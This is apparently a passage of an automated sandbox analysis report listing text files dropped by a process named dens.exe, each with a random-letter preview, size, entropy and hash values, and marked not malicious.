                                                                                                                                                                                                                                            Preview:WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                            MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                            SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                            SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                            SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                            MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                            SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                            SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                            SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                            MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                            SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                            SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                            SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
